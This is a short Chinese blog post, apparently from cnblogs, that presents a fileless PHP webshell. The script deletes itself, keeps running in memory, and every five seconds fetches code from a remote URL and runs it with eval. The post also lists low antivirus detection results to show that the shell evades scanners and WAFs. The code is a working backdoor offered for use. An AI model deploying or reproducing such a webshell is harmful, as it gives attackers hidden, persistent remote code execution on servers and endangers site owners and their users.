【分析】利用php的无文件木马,上传一个运行后会删除自己的脚本。它会驻留在内存中运行,脚本内容是一个死循环:隔一段时间运行一下远程VPS上的代码。这种没有文件落地的webshell想必waf也没办法拦截
【代码】
<?php unlink($_SERVER['SCRIPT_FILENAME']); ignore_user_abort(true); set_time_limit(0);//Windows 最好不要设置为 0, 9999更合适 $remote_file ='https://ws.hellotools.eu.org/tracker.js'; while($code = file_get_contents($remote_file)){ @eval($code); sleep(5);//休眠时间 }; ?>
查杀报告:
- VT(1/70): https://www.virustotal.com/gui/file/111ea734bfa2ee9bbbfa075ba332d658d86221cbcd193619c3decf2b49ec8b46
- 微步(安全): https://s.threatbook.com/report/file/111ea734bfa2ee9bbbfa075ba332d658d86221cbcd193619c3decf2b49ec8b46
- WEBDIR(报毒,
HEUR.WebShell.SelfDelete.1): https://scanner.baidu.com/#/pages/scan_result?hash=b51aa0bec2756ab3a94e1d1ff21a48f8 - SHELLPUB.COM(报毒): https://n.shellpub.com/detail/b984e75c-2a7e-4b0a-b97f-33b08ffef7ac
作者:HackPig520
出处:https://www.cnblogs.com/xiaozhu2020/p/php-nofile_webshell.html
本文版权归作者所有,欢迎转载,但未经作者同意必须保留此段声明,且在文章页面明显位置给出原文连接,否则保留追究法律责任的权利。
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· go语言实现终端里的倒计时
· 如何编写易于单元测试的代码
· 10年+ .NET Coder 心语,封装的思维:从隐藏、稳定开始理解其本质意义
· .NET Core 中如何实现缓存的预热?
· 从 HTTP 原因短语缺失研究 HTTP/2 和 HTTP/3 的设计差异
· 分享一个免费、快速、无限量使用的满血 DeepSeek R1 模型,支持深度思考和联网搜索!
· 基于 Docker 搭建 FRP 内网穿透开源项目(很简单哒)
· ollama系列01:轻松3步本地部署deepseek,普通电脑可用
· 按钮权限的设计及实现
· 25岁的心里话